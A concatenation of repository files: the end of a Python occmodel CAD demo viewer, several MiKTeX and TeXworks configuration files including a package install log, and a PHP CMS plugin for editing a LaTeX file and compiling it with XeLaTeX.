# wire boolean common operation
w6 = Wire().createRectangle(width = 1., height = 1., radius = 0.)
e2 = Edge().createEllipse(center=(-.5,-.5,0.),normal=(0.,0.,1.), rMajor = .75, rMinor=.35)
e2.rotate(-pi/.6, (0.,0.,1.), (-.5,-.5,0.))
w6.common(e2)
"""

    @classmethod
    def results(self, loc):
        """Show w1/w2 overlaid at the origin; space w3..w6 along x."""
        shown = [loc['w1'], loc['w2']]
        for slot, key in enumerate(('w3', 'w4', 'w5', 'w6')):
            shape = loc[key]
            shape.translate((1.5 + slot * 1.5, 0., 0))
            shown.append(shape)
        return shown
class Face_1(Demo):
    """Face creation demos: wire with hole, constrained, polygonal."""
    NAME = "Create 1"
    # Source executed by Demo.eval(); also shown in the UI source panel.
    TEXT = """
# create planar face from outer wire and edges/wires defining hole
w1 = Wire().createRectangle(width = 1., height = 1., radius = 0.)
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = .25)
f1 = Face().createFace((w1, e1))
# create a face constrained by circle and points
e2 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = .5)
f2 = Face().createConstrained(e2, ((0.,.0,.25),))
# create planar polygonal face from series of points
pnts = ((-.5,-.5,0.), (0.,.5,0.), (1.,.5,0.), (.5,-.5,0.))
f3 = Face().createPolygonal(pnts)
"""

    @classmethod
    def results(self, loc):
        """Lay the three faces out along the x axis, 1.5 units apart."""
        shown = []
        for slot, key in enumerate(('f1', 'f2', 'f3')):
            shape = loc[key]
            shape.translate((slot * 1.5, 0., 0))
            shown.append(shape)
        return shown
class Face_2(Demo):
    """Face creation demos: extrude, revolve, sweep and loft."""
    NAME = "Create 2"
    # Source executed by Demo.eval(); also shown in the UI source panel.
    TEXT = """
# create face by extruding edge/wire
e1 = Edge().createArc(start = (-.5,-.25,0.), end = (.5,.75,0.),
center = (.5,-.25,0.))
f1 = Face().extrude(e1, (0.,0.,0.), (0.,0.,1.))
# create face by revolving edge
pnts = ((0.,0.,0.), (0.,1.,0.), (1.,.5,0.), (1.,0.,0.))
e2 = Edge().createBezier(points = pnts)
f2 = Face().revolve(e2, (0.,-1.,0.), (1.,-1.,0.), pi/2.)
# create face by sweeping edge along spine
e3 = Edge().createArc((0.,0.,0.), (1.,0.,1.), (1.,0.,0.))
e4 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = .25)
f3 = Face().sweep(e3, e4)
# create face by lofting through edges
e5 = Edge().createArc((0.,0.,0.),(1.,0.,1.),(1.,0.,0.))
e6 = Edge().createArc((0.,1.,0.),(2.,1.,2.),(2.,1.,0.))
f4 = Face().loft((e5,e6))
"""

    @classmethod
    def results(self, loc):
        """Lay the four faces out along the x axis, 1.5 units apart."""
        shown = []
        for slot, key in enumerate(('f1', 'f2', 'f3', 'f4')):
            shape = loc[key]
            shape.translate((slot * 1.5, 0., 0))
            shown.append(shape)
        return shown
class Face_3(Demo):
    """Face boolean demos: cut by an edge, common with an ellipse."""
    NAME = "Create 3"
    # Source executed by Demo.eval(); also shown in the UI source panel.
    TEXT = """
# cut face by edge
e1 = Edge().createArc(start = (-.5,-.25,0.), end = (.5,.75,0.), center = (.5,-.25,0.))
f1 = Face().extrude(e1, (0.,0.,0.), (0.,0.,1.))
e2 = Edge().createCircle(center=(.5,.5,0.),normal=(0.,1.,0.),radius = .75)
f1.cut(e2)
# find common face between circulare face and ellipse
e3 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = .5)
f2 = Face().createFace(e3)
e4 = Edge().createEllipse(center=(0.,0.,0.),normal=(0.,0.,1.), rMajor = .75, rMinor=.3)
f2.common(e4)
"""

    @classmethod
    def results(self, loc):
        """Lay the two faces out along the x axis, 1.5 units apart."""
        shown = []
        for slot, key in enumerate(('f1', 'f2')):
            shape = loc[key]
            shape.translate((slot * 1.5, 0., 0))
            shown.append(shape)
        return shown
class Solid_1(Demo):
    """Solid primitive demos: sphere, cylinder, torus, cone and box."""
    NAME = "Primitives"
    # Source executed by Demo.eval(); also shown in the UI source panel.
    TEXT = """
# solid sphere from center and radius
s1 = Solid().createSphere((0.,0.,0.),.5)
# solid cylinder from two points and radius
s2 = Solid().createCylinder((0.,0.,0.),(0.,0.,1.), .25)
# solid torus from two points defining axis, ring radius and radius.
s3 = Solid().createTorus((0.,0.,0.),(0.,0.,.1), .5, .1)
# solid cone from two points defining axis and upper and lower radius
s4 = Solid().createCone((0.,0.,0.),(0.,0.,1.), .2, .5)
# solid box from two points defining diagonal of box
s5 = Solid().createBox((-.5,-.5,-.5),(.5,.5,.5))
"""

    @classmethod
    def results(self, loc):
        """Lay the five solids out along the x axis, 1.5 units apart."""
        shown = []
        for slot, key in enumerate(('s1', 's2', 's3', 's4', 's5')):
            shape = loc[key]
            shape.translate((slot * 1.5, 0., 0))
            shown.append(shape)
        return shown
class Solid_2(Demo):
    """Solid creation demos: extrude, revolve, sweep, loft and pipe."""
    NAME = "Create 1"
    # Source executed by Demo.eval(); also shown in the UI source panel.
    TEXT = """
# create solid by extruding face
e1 = Edge().createLine((-.5,0.,0.),(.5,0.,0.))
e2 = Edge().createArc3P((.5,0.,0.),(-.5,0.,0.),(0.,.5,0.))
w1 = Wire().createWire((e1,e2))
f1 = Face().createFace(w1)
s1 = Solid().extrude(f1, (0.,0.,0.), (0.,0.,1.))
# create solid by revolving face
e2 = Edge().createEllipse(center=(0.,0.,0.),normal=(0.,0.,1.), rMajor = .5, rMinor=.2)
f2 = Face().createFace(e2)
s2 = Solid().revolve(f2, (1.,0.,0.), (1.,1.,0.), pi/2.)
# create solid by sweeping wire along wire path
w1 = Wire().createPolygon((
(0.,0.,0.),
(0.,0.,1.),
(.75,0.,1.),
(.75,0.,0.)),
close = False
)
e3 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = .2)
s3 = Solid().sweep(w1, e3, cornerMode = SWEEP_RIGHT_CORNER)
# create solid by lofting through edges, wires and optional start/end vertex.
e4 = Edge().createCircle(center=(.25,0.,0.),normal=(0.,0.,1.),radius = .25)
e5 = Edge().createCircle(center=(.25,0.,.5),normal=(0.,0.,1.),radius = .5)
v1 = Vertex(.25,0.,1.)
s4 = Solid().loft((e4,e5,v1))
# create solid by sweeping face along path
e6 = Edge().createHelix(.4, 1., .4)
e7 = Edge().createCircle(center=(.5,0.,0.),normal=(0.,1.,0.),radius = 0.1)
f3 = Face().createFace(e7)
s5 = Solid().pipe(f3, e6)
"""

    @classmethod
    def results(self, loc):
        """Lay the five solids out along the x axis, 1.5 units apart."""
        shown = []
        for slot, key in enumerate(('s1', 's2', 's3', 's4', 's5')):
            shape = loc[key]
            shape.translate((slot * 1.5, 0., 0))
            shown.append(shape)
        return shown
class Solid_3(Demo):
    """Solid modification demos: fuse, cut, common, fillet, chamfer,
    shell and face offset."""
    NAME = "Create 2"
    # Source executed by Demo.eval(); also shown in the UI source panel.
    TEXT = """
# fuse solids
s1 = Solid().createBox((0.,0.,0.),(.5,.5,.5))
s2 = Solid().createBox((.25,.25,.25),(.75,.75,.75))
s1.fuse(s2)
# modifying solid by cutting against edge,wire,face or solid.
# Edge and wire always cut through, but Face only cuts in the
# direction of the normal.
s2 = Solid().createBox((0.,0.,0.),(1.,1.,1.))
e1 = Edge().createCircle(center=(0.5,0.5,1.),normal=(0.,0.,1.),radius = 0.1)
e2 = Edge().createCircle(center=(.5,0.,.5),normal=(0.,0.,1.),radius = 0.25)
f1 = Face().createFace(e2)
s3 = Solid().createSphere((1.,1.,1.),.35)
s2.cut((e1,f1,s3))
# find common shape
s4 = Solid().createSphere((.5,.5,0.),.75)
s5 = Solid().createCylinder((.5,.5,-1),(0.,.5,1.), .5)
s4.common(s5)
# fillet edges
s6 = Solid().createBox((0.,0.,0.),(1.,1.,1.))
s6.fillet(.2)
# chamfer edges
s7 = Solid().createBox((0.,0.,0.),(1.,1.,1.))
s7.chamfer(.2)
# shell operation
s8 = Solid().createBox((0.,0.,0.),(1.,1.,1.))
s8.shell(-.1)
# offset face to create solid
e3 = Edge().createArc((0.,0.,0.),(.5,0.,.5),(.5,0.,0.))
e4= Edge().createArc((0.,.5,0.),(1.,.5,1.),(1.,.5,0.))
f2 = Face().loft((e3,e4))
s9 = Solid().offset(f2, 0.2)
"""

    @classmethod
    def results(self, loc):
        """Lay the result solids out along the x axis, 1.5 units apart
        (s3 and s5 are consumed by the boolean operations above)."""
        shown = []
        for slot, key in enumerate(('s1', 's2', 's4', 's6', 's7', 's8', 's9')):
            shape = loc[key]
            shape.translate((slot * 1.5, 0., 0))
            shown.append(shape)
        return shown
class Solid_4(Demo):
    """Solid creation demos: sewing faces into a solid, text solid."""
    NAME = "Create 3"
    # Source executed by Demo.eval(); also shown in the UI source panel.
    TEXT = """
# create solid by sewing together faces
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,-1.),radius = .5)
f1 = Face().createConstrained(e1, ((0.,.0,-.5),))
e2 = Edge().createCircle(center=(0.,0.,1.),normal=(0.,0.,1.),radius = .5)
f2 = Face().createConstrained(e2, ((0.,.0,1.5),))
f3 = Face().loft((e1,e2))
s1 = Solid().createSolid((f1,f3,f2))
# create solid from TrueType font
s2 = Solid().createText(1., .25, 'Tenko')
"""

    @classmethod
    def results(self, loc):
        """Lay the two solids out along the x axis, 1.5 units apart."""
        shown = []
        for slot, key in enumerate(('s1', 's2')):
            shape = loc[key]
            shape.translate((slot * 1.5, 0., 0))
            shown.append(shape)
        return shown
class DemoViewer(Viewer):
    """Interactive occmodel demo browser.

    Adds an immediate-mode menu (view presets + demo selection) and a
    source-code panel on top of the base Viewer window.
    """

    def __init__(self, fullscreen = False):
        title = "Demo (F1 for help - 'm' to toggle menu)"
        Viewer.__init__(self, -1, -1, title, fullscreen)
        self.uiView = False   # "View settings" section expanded?
        self.uiDemo = True    # "Demos" section expanded?
        self.showUI = True    # 'm' key toggles the whole menu
        self.source = ''      # source text of the currently shown demo
        self.defaultColor = gl.ColorRGBA(100,100,100,255)
        self.edgeColor = gl.ColorRGBA(255,255,255,255)

    def activeUI(self, x, y):
        # Return True when (x, y) lies over a UI region, so mouse events
        # there are not interpreted as 3D navigation.
        w, h = self.width, self.height
        y = h - y  # flip to UI coordinates (origin at the bottom)
        if not self.showUI:
            return False
        if self.ui.anyActive() or self.uiHelp:
            return True
        # menu strip on the left
        if x >= 10 and x <= 200:
            if y >= .4*h and y <= h - 10:
                return True
        # source panel at the bottom right (only when a demo is shown)
        if self.source and x >= .5*w and x < w - 10:
            if y >= 10 and y <= 160:
                return True
        return False

    def onUI(self):
        # Build one frame of the immediate-mode UI; returns True when a
        # change requires a redraw.
        if self.uiQuit:
            return self.onUIQuit()
        if self.uiHelp:
            return self.onUIHelp()
        ui = self.ui
        update = False
        w, h = self.width, self.height
        x, y = self.lastPos
        scroll = self.uiScroll
        if scroll != 0:
            self.uiScroll = 0
        if not self.showUI:
            # empty gui
            ui.beginFrame(x,h - y,self.currentButton,scroll)
            ui.endFrame()
            return update
        ui.beginFrame(x,h - y,self.currentButton,scroll)
        ui.beginScrollArea("Menu", 10, .4*h, 200, .6*h - 10)
        ui.separatorLine()
        # Collapsible "View settings" section.
        if ui.collapse("View settings", "", self.uiView, True):
            self.uiView = not self.uiView
        if self.uiView:
            ui.indent()
            ui.label("View presets")
            ui.indent()
            if ui.item('Top', True):
                self.onTopView()
                update = True
            if ui.item('Bottom', True):
                self.onBottomView()
                update = True
            if ui.item('Front', True):
                self.onFrontView()
                update = True
            if ui.item('Back', True):
                self.onBackView()
                update = True
            if ui.item('Left', True):
                self.onLeftView()
                update = True
            if ui.item('Right', True):
                self.onRightView()
                update = True
            if ui.item('Iso', True):
                self.onIsoView()
                update = True
            ui.unindent()
            if ui.check('Gradient background', self.uiGradient, True):
                self.uiGradient = not self.uiGradient
                update = True
            if ui.check('Specular material', self.uiSpecular, True):
                self.uiSpecular = not self.uiSpecular
                update = True
            if ui.check('Draw face edges', self.uiEdges, True):
                self.uiEdges = not self.uiEdges
                update = True
            if ui.button('Take screenshot', True):
                self.onScreenShot(prefix = 'demoShot')
            ui.unindent()
        ui.separatorLine()
        # Collapsible "Demos" section listing every Demo subclass.
        if ui.collapse("Demos", "", self.uiDemo, True):
            self.uiDemo = not self.uiDemo
        if self.uiDemo:
            ui.indent()
            ui.label("Edges")
            ui.indent()
            if ui.item(Edge_1.NAME, True):
                self.onSetDemo(Edge_1)
                update = True
            ui.unindent()
            ui.label("Wires")
            ui.indent()
            if ui.item(Wire_1.NAME, True):
                self.onSetDemo(Wire_1)
                update = True
            if ui.item(Wire_2.NAME, True):
                self.onSetDemo(Wire_2)
                update = True
            ui.unindent()
            ui.label("Faces")
            ui.indent()
            if ui.item(Face_1.NAME, True):
                self.onSetDemo(Face_1)
                update = True
            if ui.item(Face_2.NAME, True):
                self.onSetDemo(Face_2)
                update = True
            if ui.item(Face_3.NAME, True):
                self.onSetDemo(Face_3)
                update = True
            ui.unindent()
            ui.label("Solids")
            ui.indent()
            if ui.item(Solid_1.NAME, True):
                self.onSetDemo(Solid_1)
                update = True
            if ui.item(Solid_2.NAME, True):
                self.onSetDemo(Solid_2)
                update = True
            if ui.item(Solid_3.NAME, True):
                self.onSetDemo(Solid_3)
                update = True
            if ui.item(Solid_4.NAME, True):
                self.onSetDemo(Solid_4)
                update = True
            # NOTE(review): this ui.indent() looks like it should be
            # ui.unindent() to balance the section -- confirm against
            # the gltools UI API before changing.
            ui.indent()
        ui.endScrollArea()
        if self.source:
            # Show the current demo's source in a scrollable panel.
            ui.beginScrollArea("Source", .5*w, 10, .5*w - 10, 150.)
            for line in self.source.splitlines():
                if not line.strip():
                    ui.separator()
                    continue
                ui.label(line)
            ui.endScrollArea()
        ui.endFrame()
        return update

    def onSetDemo(self, demo):
        # Run the selected demo and replace the scene with its results.
        self.source = demo.TEXT.strip()
        self.bbox.invalidate()
        self.clear()
        for obj in demo.eval():
            self.add(obj)
        self.onIsoView()

    def onChar(self, ch):
        # 'm' toggles menu visibility; everything else goes to the base.
        if ch == 'm':
            self.showUI = not self.showUI
            self.onRefresh()
        Viewer.onChar(self, ch)
def main():
    """Open the demo viewer in an isometric view and run its loop."""
    viewer = DemoViewer()
    viewer.onIsoView()
    viewer.mainLoop()

if __name__ == '__main__':
    main()
<file_sep>;;; DO NOT EDIT THIS FILE!
buf_size=4000000
extra_mem_bot=2000000
extra_mem_top=4000000
font_max=5000
font_mem_size=2000000
hash_extra=100000
hyph_size=8191
main_memory=2000000
max_print_line=255
max_strings=262000
nest_size=500
param_size=10000
pool_free=47500
pool_size=2000000
save_size=50000
stack_size=10000
string_vacancies=125000
trie_size=500000
[pdftex]
pdf_mem_size=500000
obj_tab_size=300000
dest_names_size=130000
[ft.tex]
path=.
path;=%R/tex/context//
path;=%R/tex/plain//
path;=%R/tex/generic//
path;=%R/tex//
<file_sep>;;; DO NOT EDIT THIS FILE!
!include dvipdfm-common.ini
;;;
@c22a0accd4315b1e863c9fbe7a0bc8ec
<file_sep>;;; DO NOT EDIT THIS FILE!
[MPM]
AutoInstall=1
ProxyAuthReq=f
ProxyHost=
RemoteRepository=ftp://ftp.ccu.edu.tw/pub/tex/systems/win32/miktex/tm/packages/
RepositoryType=remote
ProxyPort=8080
UseProxy=f
[Update]
alwaysWelcome=f
<file_sep>;;; DO NOT EDIT THIS FILE!
[tex4ht]
TEX4HTFONTSET=alias,iso8859
TEX4HTINPUTS=.
TEX4HTINPUTS;=%R/tex4ht/base//
TEX4HTINPUTS;=%R/tex4ht/ht-fonts/alias//
TEX4HTINPUTS;=%R/tex4ht/ht-fonts/iso8859//
;;;
@027e28f510421a67b33b8d2b3e458362
<file_sep>;;; DO NOT EDIT THIS FILE!
[ft.tex]
extensions=
extensions;=.tex
extensions;=.mex
path=.
path;=%R/tex/mex//
path;=%R/tex/plain//
path;=%R/tex/generic//
path;=%R/tex//
;;;
@1d928c42deba82bd4e09920ed426fae8
<file_sep>[001]
name=LaTeXify
program=latexify.bat
arguments=$basename
showPdf=true
[002]
name=pdfLaTeX
program=pdflatex.exe
arguments="-synctex=1", $fullname
showPdf=true
[003]
name=XeLaTeX
program=xelatex.exe
arguments="-synctex=1", $fullname
showPdf=true
[004]
name=ConTeXt
program=texmfstart.exe
arguments=texexec, $fullname
showPdf=true
[005]
name=XeConTeXt
program=texmfstart.exe
arguments=texexec, --xtx, $fullname
showPdf=true
[006]
name=BibTeX
program=bibtex.exe
arguments=$basename
showPdf=false
[007]
name=MakeIndex
program=makeindex.exe
arguments=$basename
showPdf=false
<file_sep><?php
// 2012.06.02
// latexeditor plugin
// Added feature: if the target file for editing does not exist yet,
// this editor creates the plugin directory/file by itself.
$editor_pass = $cf['myeditor']['pass'];
session_start();
// $texfile below is a base name such as "simple" for simple.tex; the
// ".tex" suffix is appended automatically by this plugin.
// Entry point: dispatches on the "menu" request parameter and works on
// downloads/<texfile>.tex, cloning it from template.tex when missing.
function latexeditorMain($texfile)
{
    global $menu;
    $menu=$_GET["menu"];
    $file=$_GET["file"];
    // Reject an empty target name up front.
    if ($texfile == "")
    {
        $output = "Error! Please contact the system administrator!";
        return $output;
    }
    if (file_exists("downloads/".$texfile.".tex")) {
        // file already exists: keep going
    } else {
        // No such LaTeX file yet: clone it from template.tex.
        if (!copy("downloads/template.tex", "downloads/".$texfile.".tex"))
        {
            $output = "can not create ".$texfile.".tex file";
            return $output;
        }
        // (earlier approach: create an empty file)
        //$ourFileHandle = fopen("./downloads/".$texfile, 'w') or die("can not create ".$texfile." file");
        //fclose($ourFileHandle);
    }
    $output="正在編輯 ".$texfile.".tex latex 文件<br /><br />";
    switch($menu)
    {
        case "latexeditorform":
            if($_SESSION["latexeditortoken"])
                $output.=latexeditorForm($texfile);
            else
                $output=latexeditorLogin();
            break;
        case "latexeditorsave":
            if($_SESSION["latexeditortoken"])
                $output.=latexeditorSave($texfile);
            else
                // NOTE(review): latexlogin2() is not defined in this
                // file -- probably meant latexeditorLogin(); confirm
                // against the rest of the plugin before changing.
                $output=latexlogin2();
            break;
        case "latexeditorcheck":
            $output=latexeditorCheck($texfile);
            break;
        case "latexeditorlogout":
            $output=latexeditorLogout();
            break;
        default:
            $output=latexeditorLogin();
    }
    return $output;
}
// Render the password login form for the LaTeX editor.
function latexeditorLogin()
{
    global $sn, $su;
    $form = "請輸入登入密碼"
        . "<form method=POST action=" . $sn . "?" . $su . "&menu=latexeditorcheck><br>"
        . "密碼:<input type=password name=editorpass>"
        . "<input type=submit value=send>"
        . "</form>";
    return $form;
}
// Destroy the session and show the login form again.
function latexeditorLogout()
{
    session_destroy();
    return "已經登出<br>" . latexeditorLogin();
}
// Validate the submitted password; on success mark the session as
// authenticated and show the menu, otherwise show the login form again.
function latexeditorCheck($texfile)
{
    global $editor_pass;
    $password = $_POST["editorpass"];
    // The original assigned `$output = $password` here, briefly holding
    // the cleartext password in the output variable; both branches below
    // overwrite it, so the dead store is removed.
    if ($password === $editor_pass)  // strict compare avoids type juggling
    {
        $_SESSION["latexeditortoken"] = true;
        $output = latexeditorPrintmenu($texfile);
    }
    else
    {
        $_SESSION["latexeditortoken"] = false;
        $output = latexeditorLogin();
    }
    return $output;
}
// Render the post-login menu: an "edit <texfile>.tex" link and a logout link.
function latexeditorPrintmenu($texfile)
{
    global $sn, $su;
    // Initialize with `=`: the original used `.=` on an undefined
    // variable, raising an E_NOTICE on every call.
    $output = "<br /><a href=" . $sn . "?" . $su . "&menu=latexeditorform>編輯 " . $texfile . ".tex 檔案</a>|";
    $output .= "<a href=" . $sn . "?" . $su . "&menu=latexeditorlogout>logout</a>|<br /><br />";
    return $output;
}
// Show the edit form pre-filled with the current contents of the file.
function latexeditorForm($texfile)
{
    global $sn, $su;
    $path = "downloads/" . $texfile . ".tex";
    // file_get_contents() replaces the original fopen/filesize/fread
    // sequence, which warned on zero-length files (fread() requires a
    // length greater than 0).
    $contents = file_get_contents($path);
    if ($contents === false) {
        $contents = "";
    }
    $output = "<form method=post action=" . $sn . "?" . $su . "&menu=latexeditorsave>";
    $output .= "<textarea cols=50 rows=20 name=\"content\">";
    // Escape for display inside the textarea; reversed on save with
    // htmlspecialchars_decode().
    $output .= htmlspecialchars($contents);
    $output .= "</textarea>";
    $output .= "<br><input type=submit value=send>";
    $output .= "</form><br /><br />";
    $output .= latexeditorPrintmenu($texfile);
    return $output;
}
function latexeditorSave($texfile)
{
// Save the POSTed TeX source to downloads/<texfile>.tex, run the
// XeLaTeX -> xdvipdfmx compile pipeline on it, then re-render the edit
// form together with download links for the resulting PDF and log.
global $sn,$su;
// magic_quotes_gpc (PHP <= 5.3) auto-escaped POST data; strip those
// slashes before undoing the htmlspecialchars() applied by the form.
if(ini_get('magic_quotes_gpc')=="1")
{
$content = stripslashes(htmlspecialchars_decode($_POST["content"]));
}
else
{
$content = htmlspecialchars_decode($_POST["content"]);
}
// Overwrite the .tex file with the submitted content.
// NOTE(review): fopen()/fwrite() results are unchecked — a write
// failure is silently ignored; confirm downloads/ is always writable.
$fp = fopen ("downloads/".$texfile.".tex", "w");
fwrite($fp,$content);
fclose($fp);
// NOTE(review): "$output .=" appends to a variable that was never
// initialized — relies on PHP treating it as "" (E_WARNING under PHP 8).
$output .= date("H:i:s").":已經存檔,請在以下編輯區,繼續編輯<br />";
// Run the LaTeX compile step: XeLaTeX producing an .xdv (no PDF yet).
exec("V:/portable_latex/MiKTeX/texmf/miktex/bin/xelatex.exe -no-pdf -interaction=nonstopmode -output-directory=downloads/ downloads/".$texfile.".tex");
// Convert the .xdv output to a PDF with xdvipdfmx.
exec("V:/portable_latex/MiKTeX/texmf/miktex/bin/xdvipdfmx.exe -vv -E -o downloads/".$texfile.".pdf downloads/".$texfile.".xdv");
// Emit download links for the generated PDF and the compile log.
$output .= "<br /><a href=\"?download=".$texfile.".pdf\">".$texfile.".pdf</a> | ";
$output .= "<a href=\"?download=".$texfile.".log\">".$texfile.".log</a><br /><br />";
// Re-render the edit form (same markup as latexeditorForm) so the user
// can keep editing after the save/compile round trip.
$output.="<form method=post action=".$sn."?".$su."&menu=latexeditorsave>";
//$output.=dirname(__FILE__);
$fp = fopen ("downloads/".$texfile.".tex", "r");
$contents = fread($fp, filesize("downloads/".$texfile.".tex"));
fclose($fp);
$output.="<textarea cols=50 rows=20 name=\"content\">";
// htmlspecialchars() so the TeX source displays verbatim in the HTML
// textarea; htmlspecialchars_decode() reverses it on the next save.
$output.=htmlspecialchars($contents);
$output.="</textarea>";
$output.="<br><input type=submit value=send>";
$output.="</form>";
$output.=latexeditorPrintmenu($texfile);
return $output;
}<file_sep>;;; DO NOT EDIT THIS FILE!
[nomencl]
TimeInstalled=1264143811
[miktex-arctrl-bin-2.8]
TimeInstalled=1256205817
[sauerj]
TimeInstalled=1313545847
[jknappen]
TimeInstalled=1256205803
[ncntrsbk]
TimeInstalled=1256205838
[miktex-omega-bin-2.8]
TimeInstalled=1256205829
[miktex-mkfntmap-bin-2.8]
TimeInstalled=1256205829
[setspace]
TimeInstalled=1264143837
[hyphenat]
TimeInstalled=1313545884
[spie]
TimeInstalled=1264143838
[miktex-freetype-bin-2.8]
TimeInstalled=1256205824
[miktex-runtime-bin-2.8]
TimeInstalled=1256205834
[miktex-tex4ht-bin-2.8]
TimeInstalled=1256205834
[covington]
TimeInstalled=1264143757
[miktex-findtexmf-bin-2.8]
TimeInstalled=1256205824
[miktex-hyph-usenglish]
TimeInstalled=1256205826
[miktex-dvips-doc]
TimeInstalled=1256205824
[courier]
TimeInstalled=1256205797
[psnfss]
TimeInstalled=1256205843
[achemso]
TimeInstalled=1264143742
[miktex-tex-misc]
TimeInstalled=1256205834
[carlisle]
TimeInstalled=1256205796
[miktex-poppler-bin-2.8]
TimeInstalled=1256205833
[miktex-texinfo-bin-2.8]
TimeInstalled=1256205834
[miktex-metafont-bin-2.8]
TimeInstalled=1256205827
[mdwtools]
TimeInstalled=1347002196
[caption]
TimeInstalled=1313545706
[filecontents]
TimeInstalled=1313545752
[plgraph]
TimeInstalled=1264143824
[miktex-doc-2.8]
TimeInstalled=1264143483
[moderncv]
TimeInstalled=1264143808
[miktex-bibtex8bit-bin-2.8]
TimeInstalled=1256205818
[listings]
TimeInstalled=1264143792
[apa]
TimeInstalled=1264143743
[miktex-yap-bin-2.8]
TimeInstalled=1256205838
[miktex-psutils-bin-2.8]
TimeInstalled=1256205833
[miktex-qt4-bin]
TimeInstalled=1264143504
[soul]
TimeInstalled=1264143838
[miktex-hunspell-bin-2.8]
TimeInstalled=1256205826
[lettrine]
TimeInstalled=1313545888
[miktex-fontname-base]
TimeInstalled=1256205824
[miktex-dvicopy-bin-2.8]
TimeInstalled=1256205823
[rotating]
TimeInstalled=1264143835
[media9]
TimeInstalled=1338965873
[elsevier]
TimeInstalled=1264143762
[miktex-ghostscript-bin]
TimeInstalled=1256205826
[jurabib]
TimeInstalled=1264143774
[adjustbox]
TimeInstalled=1338907347
[frletter]
TimeInstalled=1313545771
[breakurl]
TimeInstalled=1313545880
[ccfonts]
TimeInstalled=1264143756
[cjk]
TimeInstalled=1313655570
[apacite]
TimeInstalled=1264143745
[miktex-bibtex-bin-2.8]
TimeInstalled=1256205818
[xargs]
TimeInstalled=1264143877
[miktex-makeindex-base]
TimeInstalled=1256205827
[miktex-pdftex-bin-2.8]
TimeInstalled=1256205829
[xstring]
TimeInstalled=1338907342
[miktex-dvipng-bin-2.8]
TimeInstalled=1256205823
[ntgclass]
TimeInstalled=1315140148
[symbol]
TimeInstalled=1315522713
[eco]
TimeInstalled=1264143760
[extsizes]
TimeInstalled=1264143764
[amsfonts]
TimeInstalled=1256205794
[miktex-etex-base]
TimeInstalled=1256205824
[miktex-ps2pk-bin-2.8]
TimeInstalled=1256205833
[unicode]
TimeInstalled=1313545766
Obsolete=1
[harvard]
TimeInstalled=1313545670
[ifplatform]
TimeInstalled=1315235093
[ifoddpage]
TimeInstalled=1338907357
[europecv]
TimeInstalled=1264143764
[croatian]
TimeInstalled=1313656054
[refstyle]
TimeInstalled=1313545909
[placeins]
TimeInstalled=1313545855
[exercise]
TimeInstalled=1346888204
[textcase]
TimeInstalled=1313545859
[miktex-config-2.8]
TimeInstalled=1256205818
[miktex-dict-english]
TimeInstalled=1256205819
[tufte-latex]
TimeInstalled=1264143873
[mathpazo]
TimeInstalled=1346888667
[l3packages]
TimeInstalled=1338906974
[euenc]
TimeInstalled=1256205799
[ifxetex]
TimeInstalled=1256205803
[amslatex]
TimeInstalled=1256205794
[miktex-misc]
TimeInstalled=1264143484
[miktex-mthelp-bin-2.8]
TimeInstalled=1256205829
[xkeyval]
TimeInstalled=1256205847
[thumbpdf]
TimeInstalled=1256205845
[dehyph-exptl]
TimeInstalled=1256205797
[paper]
TimeInstalled=1264143811
[miktex-mo-bin-2.8]
TimeInstalled=1256205829
[ifsym]
TimeInstalled=1264143772
[miktex-latex-config]
TimeInstalled=1256205827
[miktex-dvips-base]
TimeInstalled=1256205824
[metalogo]
TimeInstalled=1315053281
[miktex-dvipdfm-base-2.7]
TimeInstalled=1256205823
[aastex]
TimeInstalled=1264143740
[dtk]
TimeInstalled=1264143759
[miktex-dvips-bin-2.8]
TimeInstalled=1256205824
[ieeetran]
TimeInstalled=1264143772
[pdfpages]
TimeInstalled=1264143812
[ctex]
TimeInstalled=1264143759
[lineno]
TimeInstalled=1313545719
[koma-script]
TimeInstalled=1264143790
[miktex-bibtex-base]
TimeInstalled=1256205818
[arabi]
TimeInstalled=1313545876
[cmbright]
TimeInstalled=1264143757
[miktex-dict-french]
TimeInstalled=1256205819
[miktex-gsf2pk-bin-2.8]
TimeInstalled=1256205826
[titlesec]
TimeInstalled=1313545863
[miktex-mktex-bin-2.8]
TimeInstalled=1256205829
[units]
TimeInstalled=1264143876
[zapfding]
TimeInstalled=1256205847
[miktex-metafont-base]
TimeInstalled=1256205827
[eurofont]
TimeInstalled=1313545812
[g-brief]
TimeInstalled=1264143767
[latex2e-help-texinfo]
TimeInstalled=1256205803
[kluwer]
TimeInstalled=1264143774
[utopia]
TimeInstalled=1256205846
[etoolbox]
TimeInstalled=1314706208
[appendix]
TimeInstalled=1346888489
[miktex-pdftex-doc-2.6]
TimeInstalled=1256205830
[hyph-utf8]
TimeInstalled=1256205803
[miktex-pdftex-base]
TimeInstalled=1256205829
[xifthen]
TimeInstalled=1313545868
[braille]
TimeInstalled=1264143756
[miktex-fontconfig-bin-2.8]
TimeInstalled=1256205824
[miktex-vc90-bin]
TimeInstalled=1256205838
[miktex-ghostscript-base]
TimeInstalled=1256205826
[xecjk]
TimeInstalled=1264144614
[bera]
TimeInstalled=1264143755
[genmisc]
TimeInstalled=1313545896
[mwcls]
TimeInstalled=1264143809
[miktex-mfware-bin-2.8]
TimeInstalled=1256205829
[miktex-metafont-misc]
TimeInstalled=1256205827
[powerdot]
TimeInstalled=1264143825
[multirow]
TimeInstalled=1256205838
[avantgar]
TimeInstalled=1256205794
[miktex-texworks-bin-2.8]
TimeInstalled=1264143509
[ccaption]
TimeInstalled=1360401460
[rotfloat]
TimeInstalled=1264143835
[mathtime]
TimeInstalled=1339110817
[translator]
TimeInstalled=1315522693
[xltxtra]
TimeInstalled=1264143714
[miktex-icu-bin]
TimeInstalled=1256205827
[miktex-cweb-bin-2.8]
TimeInstalled=1256205819
[catoptions]
TimeInstalled=1338907362
[enumitem]
TimeInstalled=1264143763
[eso-pic]
TimeInstalled=1360401447
[babel]
TimeInstalled=1256205795
[feyn]
TimeInstalled=1313545922
[bidi]
TimeInstalled=1264143366
[cjkpunct]
TimeInstalled=1264144536
[levy-font]
TimeInstalled=1346893827
[miktex-xetex-bin-2.8]
TimeInstalled=1256205838
[latex-fonts]
TimeInstalled=1256205803
